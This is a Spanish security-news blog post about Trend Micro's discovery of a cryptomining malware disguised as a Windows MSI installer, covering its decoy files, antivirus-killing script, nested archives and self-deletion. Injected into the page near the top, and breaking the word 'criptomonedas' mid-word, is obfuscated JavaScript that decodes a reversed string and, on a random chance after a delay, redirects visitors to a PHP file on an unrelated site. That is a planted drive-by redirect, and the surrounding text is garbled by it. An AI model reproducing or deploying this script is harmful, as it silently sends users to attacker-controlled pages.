Consiguen esconder malware para minar criptomonedas en archivos de instalación de Windows
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tomonedas-malware.jpg” width=”1268″ height=”664″ /><br />
<br />
<br />
El malware que utiliza los recursos de tu ordenador para minar crip<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tomonedas está muy lejos de desaparecer. Mientras que la mayoría de este malware se ejecuta en el navegador web, Trend Micro ha descubierto un uevo tipo que se camufla dentro de archivos de instalación de Windows en formato .MSI.
Un nuevo malware se camufla como un archivo de instalación de Windows
Los métodos de detección de este tipo de malware son cada vez más avanzados, por lo que los hackers intentan hacerlos cada vez más complejos para ocultarlos. Por ello, han recurrido al formato MSI, que es el formato de instalación de paquetes de Windows, y así se hacen pasar por paquetes legítimos.
minar criptomonedas malware
Este Coinminer estaba diseñado específicamente para no ser detectado mediante diversos métodos de ofuscación. El hecho de usar el formato MSI da una mayor sensación de seguridad al usuario. Al instalarse, en la ruta de destino sólo encontramos varios archivos que hacen de señuelo.
Estos archivos son uno en formato .bat, que cierra todos los servicios relacionados con el antivirus; un .exe, que es un descompresor de un tercer archivo .ico, que en realidad es un zip protegido por contraseña. Al descomprimir ese .ico, encontramos un archivo .ocx, que es módulo que descifra e instala el módulo para minar criptomonedas, y un .bin, que es el módulo para minar propiamente dicho.
El malware tiene un módulo de autodestrucción para no dejar rastro
Para evitar aún más su detección, el malware crea copias de los archivos de Windows ntdll.dll y user32.dll, probablemente para evitar la detección de la API del malware. En todo el proceso de instalación el idioma usado es ruso, por lo que nos hacemos una idea de cuál puede ser el origen del malware.
Como el mejor espía, el malware tiene un mecanismo de autodestrucción para no dejar rastro de su presencia en el ordenador, incluyendo archivos o directorios que haya creado. El dominio donde se almacenan los archivos es %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server.
Este tipo de malware no ha parado de crecer en lo que llevamos de año, y está presente en cualquier tipo de dispositivo que tenga capacidad de procesamiento, incluyendo routers, actualizaciones de Flash, webs que teóricamente son legítimas, anuncios, etc.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.